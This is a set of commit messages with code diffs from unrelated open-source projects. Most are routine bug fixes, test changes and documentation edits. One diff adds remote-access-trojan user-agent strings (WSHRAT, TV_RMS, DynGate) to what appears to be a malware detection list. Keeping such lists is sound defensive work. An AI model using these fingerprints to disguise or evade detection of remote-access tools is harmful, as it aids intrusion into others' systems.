@@ -21,6 +21,7 @@ chronographically. A number of the below methods are available in GluonTS. ### [Tree-based probabilistic forecaster](https://proceedings.neurips.cc/paper/2021/file/32b127307a606effdcc8e51f60a45922-Paper.pdf) +``` @article{hasson2021probabilistic, title={Probabilistic Forecasting: A Level-Set Approach}, author={Hasson, Hilaf and Wang, Yuyang and Januschowski, Tim and Gasthaus, Jan}, @@ -28,22 +29,27 @@ A number of the below methods are available in GluonTS. volume={34}, year={2021} } +``` ### [Deep switching models](https://papers.nips.cc/paper/2021/file/fb4c835feb0a65cc39739320d7a51c02-Paper.pdf) +``` @inproceedings{ansari2021deep, title={Deep Explicit Duration Switching Models for Time Series}, author={Ansari, Abdul Fatir and Benidis, Konstantinos and Kurle, Richard and Turkmen, Ali Caner and Soh, Harold and Smola, Alex and Wang, Bernie and Januschowski, Tim}, booktitle={Thirty-Fifth Conference on Neural Information Processing Systems}, year={2021} } +``` ### [Neural flows](https://papers.nips.cc/paper/2021/file/b21f9f98829dea9a48fd8aaddc1f159d-Paper.pdf) +``` @inproceedings{bilovs2021neural, title={Neural Flows: Efficient Alternative to Neural ODEs}, author={Bilo{\v{s}}, Marin and Sommer, Johanna and Rangapuram, Syama Sundar and Januschowski, Tim and G{\"u}nnemann, Stephan}, booktitle={Thirty-Fifth Conference on Neural Information Processing Systems}, year={2021} } +``` ### [Optimization methods for time series](http://proceedings.mlr.press/v139/lu21d/lu21d.pdf)
improve efficiency of StructuredTopology.locate. This patch changes the implementation of StructuredTopology._asaffine to avoid using basis and meshgrid, relying instead on the known ordering of points in a uniform sample.
@@ -2257,21 +2257,19 @@ class StructuredTopology(TransformChainsTopology): def _asaffine(self, geom, arguments): # determine geom0, scale, error such that geom ~= geom0 + index * scale + error - funcsp = self.basis('std', degree=1, periodic=()) - verts = numeric.meshgrid(*map(numpy.arange, numpy.array(self.shape)+1)).reshape(self.ndims, -1) - index = (funcsp * verts).sum(-1) - # strategy: fit an affine plane through the minima and maxima of a - # uniform sample, and evaluate the error as the largest difference on - # the remaining sample points - geom_, index_ = self.sample('uniform', 2 + (1 in self.shape)).eval((geom, index), **arguments) - imin = geom_.argmin(axis=0) - imax = geom_.argmax(axis=0) - R = numpy.arange(self.ndims) - scale = (geom_[imax,R] - geom_[imin,R]) / (index_[imax,R] - index_[imin,R]) - geom0 = geom_[imin,R] - index_[imin,R] * scale # geom_[im..,R] = index_[im..,R] * scale + geom0 - error = numpy.abs(geom0 + index_ * scale - geom_).max(axis=0) - - return geom0, scale, error + n = 2 + (1 in self.shape) # number of sample points required to establish nonlinearity + sampleshape = numpy.multiply(self.shape, n) # shape of uniform sample + geom_ = self.sample('uniform', n).eval(geom, **arguments) \ + .reshape(*self.shape, *[n] * self.ndims, self.ndims) \ + .transpose(*(i+j for i in range(self.ndims) for j in (0, self.ndims)), self.ndims*2) \ + .reshape(*sampleshape, self.ndims) + # strategy: fit an affine plane through the minima and maxima of a uniform sample, + # and evaluate the error as the largest difference on the remaining sample points + xmin, xmax = geom_.reshape(-1, self.ndims)[[0, -1]] + dx = (xmax - xmin) / (sampleshape-1) # x = x0 + dx * (i + .5) => xmax - xmin = dx * (sampleshape-1) + for idim in range(self.ndims): + geom_[...,idim] -= xmin[idim] + dx[idim] * numpy.arange(sampleshape[idim]).reshape([-1 if i == idim else 1 for i in range(self.ndims)]) + return xmin - dx/2, dx * n, numpy.abs(geom_).reshape(-1, self.ndims).max(axis=0) def _locate(self, geom0, scale, coords, *, eps=0, weights=None, skip_missing=False): mincoords, maxcoords = numpy.sort([geom0, geom0 + scale * self.shape], axis=0)
recognize that function name had changed. Function name had changed some time back, but global replace of function name missed this instance. This fixes the help in impulse_response
@@ -557,7 +557,7 @@ def impulse_response(sys, T=None, X0=0., input=0, output=None, See Also -------- - ForcedReponse, initial_response, step_response + forced_response, initial_response, step_response Examples --------
Tests: Added ability to specify modules to recurse to. * Intended for use with "test_dataclasses" to make it recurse into the sub-tests it has.
@@ -127,6 +127,13 @@ def main(): recurse_not.append(arg[len("recurse_not:"):]) del args[count] + recurse_to = [] + + for count, arg in reversed(tuple(enumerate(args))): + if arg.startswith("recurse_to:"): + recurse_to.append(arg[len("recurse_to:"):]) + del args[count] + if args: sys.exit("Error, non understood mode(s) '%s'," % ','.join(args))
Fix installation step to make it more neutral. This is a follow-up of
@@ -37,13 +37,19 @@ Try the Koalas 10 minutes tutorial on a live Jupyter notebook [here](https://myb ## Getting Started -Koalas can be installed as below: +Koalas can be installed in many ways such as Conda and pip. ```bash +# Conda +conda install koalas -c conda-forge +``` + +```bash +# pip pip install koalas ``` -Koalas can also be installed in many ways such as Conda. See [Installation](https://koalas.readthedocs.io/en/latest/getting_started/install.html) for full instructions to install Koalas. +See [Installation](https://koalas.readthedocs.io/en/latest/getting_started/install.html) for more details. If you are a Databricks Runtime user, you can install Koalas using the Libraries tab on the cluster UI, or using `dbutils` in a notebook as below for the regular Databricks Runtime, @@ -52,16 +58,16 @@ dbutils.library.installPyPI("koalas") dbutils.library.restartPython() ``` -or using `conda` with `--no-deps` option for Databricks Runtime for Machine Learning 6.0 and above, which provides all the required libraries. +For Databricks Runtime for Machine Learning 6.0 and above, you can install it as follows. ```sh %sh -conda install koalas -c conda-forge --no-deps +pip install koalas ``` Note that Koalas requires Databricks Runtime 5.x or above. In the future, we will package Koalas out-of-the-box in both the regular Databricks Runtime and Databricks Runtime for Machine Learning. -Lastly, note that if your PyArrow version is 0.15+ and your PySpark version is lower than 3.0, it is best for you to set `ARROW_PRE_0_15_IPC_FORMAT` environment variable to `1` manually. +Lastly, if your PyArrow version is 0.15+ and your PySpark version is lower than 3.0, it is best for you to set `ARROW_PRE_0_15_IPC_FORMAT` environment variable to `1` manually. Koalas will try its best to set it for you but it is impossible to set it if there is a Spark context already launched. Now you can turn a pandas DataFrame into a Koalas DataFrame that is API-compliant with the former:
Update dmsp_ivm.py. Updated variable name for madrigal download method.
@@ -155,7 +155,7 @@ def download(date_array, tag='', sat_id='', data_path=None, user=None, The affiliation field is set to pysat to enable tracking of pysat downloads. """ - mad_meth.download(date_array, inst_code=str(madrigal_inst_code), + mad_meth.download(date_array, inst_code=str(madrigal_inst_tag), kindat=str(madrigal_tag[sat_id][tag]), data_path=data_path, user=user, password=password)
Cleanup artifacts of earlier fixes. Only remove 'vcs+' pattern from URI in convert_deps_from_pip if the requirement URI explicitly begins with requirement.vcs+
@@ -45,7 +45,7 @@ specifiers = [k for k in lookup.keys()] # List of version control systems we support. VCS_LIST = ('git', 'svn', 'hg', 'bzr') -SCHEME_LIST = ('http://', 'https://', 'ftp://', 'file://', 'git://') +SCHEME_LIST = ('http://', 'https://', 'ftp://', 'file://') requests = requests.Session() @@ -661,10 +661,10 @@ def convert_deps_from_pip(dep): req.path = None # Crop off the git+, etc part. - if '+' in req.uri: + if req.uri.startswith('{0}+'.format(req.vcs)): req.uri = req.uri[len(req.vcs) + 1:] dependency.setdefault(req.name, {}).update({req.vcs: req.uri}) - print('dependency: {}'.format(dependency)) + # Add --editable, if it's there. if req.editable: dependency[req.name].update({'editable': True})
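A hedged sketch of the narrower check: only strip the `<vcs>+` prefix when the URI actually starts with it, so a URI that merely contains a `+` somewhere else is left alone (function name and URLs here are illustrative only).

```python
def crop_vcs_prefix(uri: str, vcs: str) -> str:
    prefix = '{0}+'.format(vcs)
    return uri[len(prefix):] if uri.startswith(prefix) else uri

assert crop_vcs_prefix('git+https://example.com/repo.git', 'git') == 'https://example.com/repo.git'
# A '+' later in the URI no longer triggers cropping, unlike the old "'+' in uri" check.
assert crop_vcs_prefix('https://example.com/pkg+extra.git', 'git') == 'https://example.com/pkg+extra.git'
```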
RandomUI : Adapt _RandomColorPlugValueWidget to new PlugValueWidget API. This means we now have proper error handling, and the computation of values is being done asynchronously.
@@ -175,6 +175,8 @@ Gaffer.Metadata.registerNode( class _RandomColorPlugValueWidget( GafferUI.PlugValueWidget ) : + __gridSize = imath.V2i( 10, 3 ) + def __init__( self, plug, **kw ) : self.__grid = GafferUI.GridContainer( spacing = 4 ) @@ -182,22 +184,41 @@ class _RandomColorPlugValueWidget( GafferUI.PlugValueWidget ) : GafferUI.PlugValueWidget.__init__( self, self.__grid, plug, **kw ) with self.__grid : - for x in range( 0, 10 ) : - for y in range( 0, 3 ) : + for x in range( 0, self.__gridSize.x ) : + for y in range( 0, self.__gridSize.y ) : GafferUI.ColorSwatch( parenting = { "index" : ( x, y ) } ) - self._updateFromPlug() - - def _updateFromPlug( self ) : + @staticmethod + def _valuesForUpdate( plugs ) : - node = self.getPlug().source().node() + node = next( iter( plugs ) ).source().node() seed = node["seed"].getValue() - gridSize = self.__grid.gridSize() - for x in range( 0, gridSize.x ) : - for y in range( 0, gridSize.y ) : - self.__grid[x,y].setColor( node.randomColor( seed ) ) + result = [] + for x in range( 0, _RandomColorPlugValueWidget.__gridSize.x ) : + column = [] + for y in range( 0, _RandomColorPlugValueWidget.__gridSize.y ) : + column.append( node.randomColor( seed ) ) seed += 1 + result.append( column ) + + return result + + def _updateFromValues( self, values, exception ) : + + for x in range( 0, self.__gridSize.x ) : + for y in range( 0, self.__gridSize.y ) : + if exception is not None : + self.__grid[x,y].setColor( imath.Color3f( 1, 0.33, 0.33 ) ) + elif len( values ) : + self.__grid[x,y].setColor( values[x][y] ) + else : + # We are called with `values == []` prior to + # the BackgroundTask for `_valuesForUpdate()` + # being launched. No point displaying a "busy" + # state as it is typically so quick as to just + # be visual noise. + pass # PlugValueWidget popup menu ##########################################################################
Fixing a race in miner submit_work. Issue
@@ -279,8 +279,9 @@ class Miner: if header_hash not in self.work_map: return False - block = self.work_map[header_hash] - header = copy.copy(block.header) + # this copy is necessary since there might be multiple submissions concurrently + block = copy.copy(self.work_map[header_hash]) + header = block.header header.nonce, header.mixhash = nonce, mixhash # lower the difficulty for root block signed by guardian @@ -297,10 +298,10 @@ class Miner: validate_seal(header, self.consensus_type) except ValueError: return False - - block.header = header # actual update try: await self.add_block_async_func(block) + # a previous submission of the same work could have removed the key + if header_hash in self.work_map: del self.work_map[header_hash] self.current_work = None return True
Disable flaky tests in dist_autograd_test. Summary: Pull Request resolved: Test Plan: Imported from OSS
@@ -379,6 +379,7 @@ class DistAutogradTest(object): def test_graph_for_builtin_remote_call(self): self._test_graph(torch.add, ExecMode.REMOTE) + @unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/28885") @dist_init def test_graph_for_python_remote_call(self): self._test_graph(my_py_add, ExecMode.REMOTE) @@ -851,6 +852,7 @@ class DistAutogradTest(object): # # These four test ps-trainer groups run on completely separate autograd # graphs, but they share the same set of underlying RpcAgents. + @unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/28874") @dist_init def test_trainer_ps(self): local_grads = None
Bug fix for multi-level display in BOM table. Multi-level BOM loading was broken, using the wrong column name for 'treeShowField'. Also adds functionality to auto-expand sub-part when loading.
@@ -812,7 +812,7 @@ function loadBomTable(table, options={}) { // Part column cols.push( { - field: 'sub_part_detail.full_name', + field: 'sub_part', title: '{% trans "Part" %}', sortable: true, switchable: false, @@ -1194,12 +1194,15 @@ function loadBomTable(table, options={}) { response[idx].parentId = bom_pk; } - var row = $(table).bootstrapTable('getRowByUniqueId', bom_pk); + var row = table.bootstrapTable('getRowByUniqueId', bom_pk); row.sub_assembly_received = true; - $(table).bootstrapTable('updateByUniqueId', bom_pk, row, true); + table.bootstrapTable('updateByUniqueId', bom_pk, row, true); table.bootstrapTable('append', response); + + // Auto-expand the newly added row + $(`.treegrid-${bom_pk}`).treegrid('expand'); }, error: function(xhr) { console.error('Error requesting BOM for part=' + part_pk); @@ -1252,28 +1255,39 @@ function loadBomTable(table, options={}) { table.treegrid({ treeColumn: 1, - onExpand: function() { - } }); table.treegrid('collapseAll'); // Callback for 'load sub assembly' button - $(table).find('.load-sub-assembly').click(function(event) { + table.find('.load-sub-assembly').click(function(event) { event.preventDefault(); var pk = $(this).attr('pk'); - var row = $(table).bootstrapTable('getRowByUniqueId', pk); + var row = table.bootstrapTable('getRowByUniqueId', pk); // Request BOM data for this subassembly requestSubItems(row.pk, row.sub_part); row.sub_assembly_requested = true; - $(table).bootstrapTable('updateByUniqueId', pk, row, true); + table.bootstrapTable('updateByUniqueId', pk, row, true); }); + + var data = table.bootstrapTable('getData'); + + for (var idx = 0; idx < data.length; idx++) { + var row = data[idx]; + + if (!row.parentId) { + row.parentId = parent_id; + + table.bootstrapTable('updateByUniqueId', row.pk, row, true); + } + } }, - onLoadSuccess: function() { + onLoadSuccess: function(data) { + if (options.editable) { table.bootstrapTable('uncheckAll'); }
Update ncbi-covid-19.yaml. Updated the description.
Name: COVID-19 Genome Sequence Dataset -Description: A centralized sequence repository for all strains of novel corona virus (SARS-CoV-2) submitted to the National Center for Biotechnology Information (NCBI). Included are both the original sequences submitted by the principal investigator as well as SRA-processed sequences that require the SRA Toolkit for analysis. +Description: A centralized sequence repository for all records containing sequence associated with the novel corona virus (SARS-CoV-2) submitted to the National Center for Biotechnology Information (NCBI) Sequence Read Archive (SRA). Included are both the original sequences submitted by the principal investigator as well as SRA-processed sequences that require the SRA Toolkit for analysis. Additionally, submitter provided metadata included in associated BioSample and BioProject records is available alongside NCBI calculated data, such k-mer based taxonomy analysis results, contiguous assemblies (contigs) and associated statistics such as contig length, blast results for the assembled contigs, contig annotation, blast databases of contigs and their annotated peptides, and VCF files generated for each record relative to the SARS-CoV-2 RefSeq record. Finally, metadata is additionally made available in parquet format to facilitate search and filtering using the AWS Athena Service. Documentation: https://www.ncbi.nlm.nih.gov/sra/docs/sra-aws-download/ Contact: https://support.nlm.nih.gov/support/create-case/ ManagedBy: "[National Library of Medicine (NLM)](http://nlm.nih.gov/)"
Mazda: Add 2023 CX9 fw. * Mazda: Add 2023 CX9 fw. DongleID: Discord User: bsk#7841. * Attempt to steer below 28mph for CX9. * undo comment
@@ -283,6 +283,7 @@ FW_VERSIONS = { b'TC3M-3210X-A-00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.engine, 0x7e0, None): [ + b'PXGW-188K2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM4-188K2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM4-188K2-D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM6-188K2-E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', @@ -299,6 +300,7 @@ FW_VERSIONS = { b'GSH7-67XK2-N\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'GSH7-67XK2-P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'GSH7-67XK2-S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'GSH7-67XK2-T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.transmission, 0x7e1, None): [ b'PXM4-21PS1-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
Update ua.txt. See also old ```apt_tvrms.txt```.
@@ -884,3 +884,8 @@ Mozilla/5.0 (Windows NT 10.0; &) # Reference: https://twitter.com/luc4m/status/1166765980489584640 WSHRAT + +# Reference: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/01075510/TV_RMS_IoC_eng.pdf + +Mozilla/4.0 (compatible; RMS) +Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Increase number of samples for testing distributions. * Increase number of samples for testing distributions. * Remove flaky annotation. * Update test_distribution_sampling.py: removed import.
import mxnet as mx import numpy as np import pytest -from flaky import flaky # First-party imports from gluonts.distribution import ( @@ -86,7 +85,6 @@ DISTRIBUTIONS_WITH_CDF = [Gaussian, Uniform, Laplace, Binned] DISTRIBUTIONS_WITH_QUANTILE_FUNCTION = [Gaussian, Uniform, Laplace, Binned] -@flaky(max_runs=3) @pytest.mark.parametrize("distr_class, params", test_cases) @pytest.mark.parametrize("serialize_fn", serialize_fn_list) def test_sampling(distr_class, params, serialize_fn) -> None: @@ -94,14 +92,16 @@ def test_sampling(distr_class, params, serialize_fn) -> None: distr = serialize_fn(distr) samples = distr.sample() assert samples.shape == (2,) - num_samples = 100_000 + num_samples = 1_000_000 samples = distr.sample(num_samples) assert samples.shape == (num_samples, 2) np_samples = samples.asnumpy() + # avoid accuracy issues with float32 when calculating std + # see https://github.com/numpy/numpy/issues/8869 + np_samples = np_samples.astype(np.float64) assert np.isfinite(np_samples).all() - assert np.allclose( np_samples.mean(axis=0), distr.mean.asnumpy(), atol=1e-2, rtol=1e-2 )
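A hedged illustration of the float32 accuracy concern referenced in the diff (numpy issue 8869): statistics of a large float32 sample around a large mean can lose precision when accumulated in float32, so the test casts to float64 before computing mean/std.

```python
import numpy as np

rng = np.random.default_rng(0)
samples = rng.normal(loc=1000.0, scale=0.1, size=1_000_000).astype(np.float32)

# Accumulating in float32 may drift from the true values; float64 is safer.
print(samples.std())                        # float32 accumulation
print(samples.astype(np.float64).std())     # what the patched test does
```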
fail silently on piexif errors. Since errors are not handled, the server currently does not respond.
@@ -292,7 +292,11 @@ class BaseEngine(object): exif_dict = self._get_exif_segment() if exif_dict and piexif.ImageIFD.Orientation in exif_dict["0th"]: exif_dict["0th"][piexif.ImageIFD.Orientation] = 1 + try: self.exif = piexif.dump(exif_dict) + except Exception as e: + msg = """[piexif] %s""" % e + logger.error(msg) def gen_image(self, size, color): raise NotImplementedError()
[NixIO] Read and write channel_ids of ChannelIndex. Fixes
@@ -262,8 +262,11 @@ class NixIO(BaseIO): for c in nix_source.sources if c.type == "neo.channelindex") chan_names = list(c["neo_name"] for c in chx if "neo_name" in c) + chan_ids = list(c["channel_id"] for c in chx if "channel_id" in c) if chan_names: neo_attrs["channel_names"] = chan_names + if chan_ids: + neo_attrs["channel_ids"] = chan_ids neo_attrs["index"] = np.array([c["index"] for c in chx]) if "coordinates" in chx[0]: coord_units = chx[0]["coordinates.units"] @@ -685,10 +688,13 @@ class NixIO(BaseIO): ) nixchan.definition = nixsource.definition chanmd = nixchan.metadata + chanmd["index"] = nix.Value(int(channel)) if len(chx.channel_names): neochanname = stringify(chx.channel_names[idx]) chanmd["neo_name"] = nix.Value(neochanname) - chanmd["index"] = nix.Value(int(channel)) + if len(chx.channel_ids): + chanid = chx.channel_ids[idx] + chanmd["channel_id"] = nix.Value(chanid) if chx.coordinates is not None: coords = chx.coordinates[idx] coordunits = stringify(coords[0].dimensionality)
Remove references not cited. Related to
@@ -80,29 +80,6 @@ year = {2019}, url = {https://bokeh.org/}, } -@book{vance2010machinery, - title={Machinery vibration and rotordynamics}, - author={Vance, John M and Zeidan, Fouad Y and Murphy, Brian G}, - year={2010}, - publisher={John Wiley \& Sons}, - doi={10.1002/9780470903704}, -} - -@book{childs1993turbomachinery, - title={Turbomachinery rotordynamics: phenomena, modeling, and analysis}, - author={Childs, Dara}, - year={1993}, - publisher={John Wiley \& Sons} -} - -@book{ishida2012linear, - title={Linear and nonlinear rotordynamics}, - author={Ishida, Yukio and Yamamoto, Toshio}, - year={2012}, - publisher={Wiley Online Library}, - doi={10.1002/9783527651894}, -} - @book{lalanne1998rotordynamics, title={Rotordynamics prediction in engineering}, author={Lalanne, Michel and Ferraris, Guy}, @@ -111,15 +88,6 @@ url = {https://bokeh.org/}, publisher={Wiley} } -@book{gasch2006rotordynamik, - title={Rotordynamik}, - author={Gasch, Robert and Nordmann, Rainer and Pf{\"u}tzner, Herbert}, - year={2006}, - publisher={Springer}, - url={https://doi.org/10.1007/978-3-662-09786-1}, - doi={10.1007/978-3-662-09786-1}, -} - @misc{comsol, title={COMSOL - {Rotordynamics Module}}, year = {2019},
ENH: more refinements on summary_logs. [CHANGED] find the start of the last exception traceback and display that.
@@ -761,18 +761,22 @@ class ReadOnlyTinyDbDataStore(ReadOnlyDataStoreBase): @property def summary_incomplete(self): """returns a table summarising incomplete results""" + # detect last exception line + err_pat = re.compile(r"[A-Z][a-z]+[A-Z][a-z]+\:.+") types = defaultdict(list) indices = "type", "origin" for member in self.incomplete: record = member.read() record = deserialise_not_completed(record) key = tuple(getattr(record, k, None) for k in indices) - types[key].append([record.message, record.source]) + match = err_pat.findall(record.message) + types[key].append([match[-1] if match else record.message, record.source]) header = list(indices) + ["message", "num", "source"] rows = [] maxtring = reprlib.aRepr.maxstring reprlib.aRepr.maxstring = 45 + for record in types: messages, sources = list(zip(*types[record])) messages = reprlib.repr(
Create a snapshot from an in-use volume with force=False. In order to test the interface of "force=False" and distinguish it from "force=True". If the interface is "force=True", we can create a snapshot from an in-use volume successfully.
@@ -16,6 +16,7 @@ from tempest.api.volume import base from tempest import config from tempest.lib.common.utils import data_utils from tempest.lib import decorators +from tempest.lib import exceptions as lib_exc from tempest import test CONF = config.CONF @@ -42,6 +43,10 @@ class VolumesSnapshotTestJSON(base.BaseVolumeTest): server = self.create_server(wait_until='ACTIVE') self.attach_volume(server['id'], self.volume_origin['id']) + # Snapshot a volume which attached to an instance with force=False + self.assertRaises(lib_exc.BadRequest, self.create_snapshot, + self.volume_origin['id'], force=False) + # Snapshot a volume even if it's attached to an instance snapshot = self.create_snapshot(self.volume_origin['id'], force=True)
Fix concatenation TypeError in code_sentences. Fixes
@@ -3197,8 +3197,10 @@ class DialogCodeText(QtWidgets.QWidget): self.autocode_history.insert(0, undo_dict) self.parent_textEdit.append(_("Automatic code sentence in files:") \ + _("\nCode: ") + item.text(0) - + _("\nWith text fragment: ") + text + _( - "\nUsing line ending: ") + ending + "\n" + msg) + + _("\nWith text fragment: ") + + text.decode("utf-8") + + _("\nUsing line ending: ") + + ending + "\n" + msg) self.app.delete_backup = False # Update tooltip filter and code tree code counts self.get_coded_text_update_eventfilter_tooltips()
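A tiny, self-contained reproduction of the TypeError being fixed: concatenating `str` and `bytes` raises, so the bytes fragment has to be decoded first, which is what the patch does.

```python
text = b"some automatically coded fragment"  # illustrative value only

try:
    "With text fragment: " + text
except TypeError as exc:
    print(exc)  # can only concatenate str (not "bytes") to str

print("With text fragment: " + text.decode("utf-8"))  # works after decoding
```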
fix: setup.cfg was not in MANIFEST.in. Add setup.cfg into MANIFEST.in.
@@ -7,6 +7,7 @@ include docs/* include docs/api/*.* include pkg/* include setup.py +include setup.cfg recursive-include src *.py # for f in tests/**/*.* ; do echo ${f/*\./*.}; done | sort | uniq recursive-include tests *.ini *.json *.properties *.py *.sh *.toml *.xml *.yml
Update TsIOCMenu.vue. Fix typo.
@@ -143,7 +143,7 @@ export default { 'intelligence' ).then(() => { Snackbar.open({ - message: 'Attribtue added successfully', + message: 'Attribute added successfully', type: 'is-white', position: 'is-top', actionText: 'View intelligence',
Fix neutron dhcp log path. The neutron dhcp-agent log path is not set properly. The service is logging at /var/log/containers/neutron/dhcp-agent.log but the log is set to /var/log/neutron/dhcp-agent.log.
@@ -27,7 +27,7 @@ parameters: type: json default: tag: openstack.neutron.agent.dhcp - path: /var/log/neutron/dhcp-agent.log + path: /var/log/containers/neutron/dhcp-agent.log EndpointMap: default: {} description: Mapping of service endpoint -> protocol. Typically set
`test_devtools_ui` - Test if dash will run when other `before_request` functions have been registered to flask. This test validates issue. The root of this issue lies in the devtools ui, and only occurs when the devtools ui has been enabled.
from time import sleep +import flask import dash_core_components as dcc import dash_html_components as html @@ -224,3 +225,38 @@ def test_dvui006_no_undo_redo(dash_duo): dash_duo.wait_for_text_to_equal("#b", "xyz") dash_duo.wait_for_no_elements("._dash-undo-redo") + + +def test_dvui007_other_before_request_func(dash_thread_server, dash_br): + # won't use `bash_br`, because it expects an dash app, but it gets an static html page. + # we take only the selenium driver from `bash_br`, this driver has already been set-up. + driver = dash_br.driver + + app = dash.Dash(__name__) + app.layout = html.Div( + [html.P(id="just_an_id", children="You should never see this")] + ) + + # create alternative response, for the endpoint '/' + # servering an alternative response, will disable further `before_request` functions e.g. those by dash + @app.server.before_request + def create_an_alternative_response(): + if flask.request.endpoint == "/": + return flask.Response( + '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n' + "<title>Alternative repsonse</title>\n" + '<h1 id="alternative_id">Alternative response header</h1>\n', + 200, + mimetype="text/html", + ) + + dash_thread_server.start( + app, + debug=True, + use_reloader=False, + use_debugger=True, + dev_tools_hot_reload=False, + ) + + driver.get(dash_thread_server.url) + driver.find_element_by_id("alternative_id")
Fix bug in Trio's _read_exactly(). This method calls Trio's `receive_some(n)`, which I found out can actually return fewer than `n` bytes. This is only noticeable on large messages (query results of around 80KB triggered the issue). The solution is to call `receive_some(...)` in a loop until `n` bytes have been received.
@@ -237,8 +237,11 @@ class ConnectionInstance: return bytes(buffer) async def _read_exactly(self, num): + data = b'' try: - return await self._stream.receive_some(num) + while len(data) < num: + data += await self._stream.receive_some(num - len(data)) + return data except (trio.BrokenResourceError, trio.ClosedResourceError): self._closed = True
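For illustration, the same loop-until-complete pattern outside the Trio class, as a minimal standalone sketch using a plain blocking socket (hypothetical helper, not part of the commit): a single receive call may legally return fewer bytes than requested, so the caller has to accumulate until the requested length arrives.

import socket

def recv_exactly(sock: socket.socket, num: int) -> bytes:
    # Illustrative only: recv() may return fewer than num bytes per call,
    # so keep reading until the full amount has been accumulated.
    data = b""
    while len(data) < num:
        chunk = sock.recv(num - len(data))
        if not chunk:  # peer closed the connection early
            raise ConnectionError("closed after %d of %d bytes" % (len(data), num))
        data += chunk
    return data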
fix: add compatibility mode for non_standard_message closes
@@ -18,8 +18,16 @@ def print_non_standard(data): format = request.values.get("format", "classic") if format == "json": return jsonify(data) + + if not data: + message = "no results" + result = -1 else: - return jsonify(dict(result=1, message="success", epidata=data)) + message = "success" + result = 1 + if result == -1 and is_compatibility_mode(): + return jsonify(dict(result=result, message=message)) + return jsonify(dict(result=result, message=message, epidata=data)) class APrinter:
Update match.py Reorder the decorators; order matters.
@@ -984,18 +984,18 @@ class ParticipantStats(CassiopeiaObject): def kills(self) -> int: return self._data[ParticipantStatsData].kills - @load_match_on_attributeerror @property + @load_match_on_attributeerror def baron_kills(self) -> int: return self._data[ParticipantStatsData].baronKills - @load_match_on_attributeerror @property + @load_match_on_attributeerror def bounty_level(self) -> int: return self._data[TeamData].bountyLevel - @load_match_on_attributeerror @property + @load_match_on_attributeerror def champion_experience(self) -> int: return self._data[TeamData].championExperience
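For illustration, a minimal standalone sketch of why the stacking order matters (the retry_on_attributeerror decorator below is a hypothetical stand-in for load_match_on_attributeerror): decorators apply bottom-up, so @property must be the outermost one for the class attribute to remain a property whose getter is the wrapped function.

import functools

def retry_on_attributeerror(func):
    # Hypothetical stand-in: wraps a plain function and retries the getter once.
    @functools.wraps(func)
    def wrapper(self):
        try:
            return func(self)
        except AttributeError:
            self.load()
            return func(self)
    return wrapper

class Stats:
    def load(self):
        self._kills = 7  # pretend this lazily loads the full match data

    @property                   # outermost: the attribute stays a property
    @retry_on_attributeerror    # innermost: wraps the plain getter function
    def kills(self):
        return self._kills

print(Stats().kills)  # 7: the first access hits AttributeError, loads, retries
# With the order flipped, retry_on_attributeerror would receive a property
# object instead of a function and the attribute would stop behaving as one.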
Fix IDRAC reset URL call For resetting IDRAC, the request must include a {"ResetType": "GracefulRestart"} POST body. With an empty body it gets a 400 error.
@@ -145,7 +145,8 @@ class Redfish(object): def reset(self): manager_url = self.get_manager_url() reset_url = f"{manager_url}/Actions/Manager.Reset" - request = Request(reset_url, headers=self.headers, method='POST', data=json.dumps({}).encode('utf-8')) + request = Request(reset_url, headers=self.headers, method='POST', + data=json.dumps({"ResetType": "GracefulRestart"}).encode('utf-8')) urlopen(request, context=self.context) def set_iso(self, iso_url):
Remove redundant call to StateToNumber Previously, StateToNumber was called on a vector obtained from v = NumberToState(i), so that StateToNumber(v) == i.
@@ -55,11 +55,9 @@ class DirectMatrixWrapper : public AbstractMatrixWrapper<Operator, WfType> { operator_.FindConn(v, matrix_elements, connectors, newconfs); - const auto numberv = hilbert_index_.StateToNumber(v); - for (size_t k = 0; k < connectors.size(); ++k) { - const auto j = numberv + hilbert_index_.DeltaStateToNumber( - v, connectors[k], newconfs[k]); + const auto j = i + hilbert_index_.DeltaStateToNumber(v, connectors[k], + newconfs[k]); result(i) += matrix_elements[k] * state(j); }
Adapt test_hpylong.py to CPython 3.10 CPython 3.10 does not support types with a custom __int__ in all of the PyLong_As... methods.
@@ -34,6 +34,16 @@ class TestLong(HPyTest): vi = sys.version_info return (vi.major > 3 or (vi.major == 3 and vi.minor >= 8)) + def python_supports_magic_int(self): + """ Return True if the Python version is 3.9 or earlier and thus + should support calling __int__ on non-int based types in some + HPyLong_As... methods. + """ + import sys + vi = sys.version_info + assert vi.major >= 3 + return (vi.major == 3 and vi.minor <= 9) + def test_Long_FromLong(self): mod = self.make_module(""" HPyDef_METH(f, "f", f_impl, HPyFunc_NOARGS) @@ -64,6 +74,7 @@ class TestLong(HPyTest): assert mod.f(45) == 90 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 4 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 4 @@ -123,6 +134,7 @@ class TestLong(HPyTest): assert mod.f(-1) == 2**self.unsigned_long_bits() - 1 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 2 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 2 @@ -159,6 +171,7 @@ class TestLong(HPyTest): assert mod.f(-2147483648) == -2147483648 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 2 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 2 @@ -219,6 +232,7 @@ class TestLong(HPyTest): assert mod.f(-1) == 2**64 - 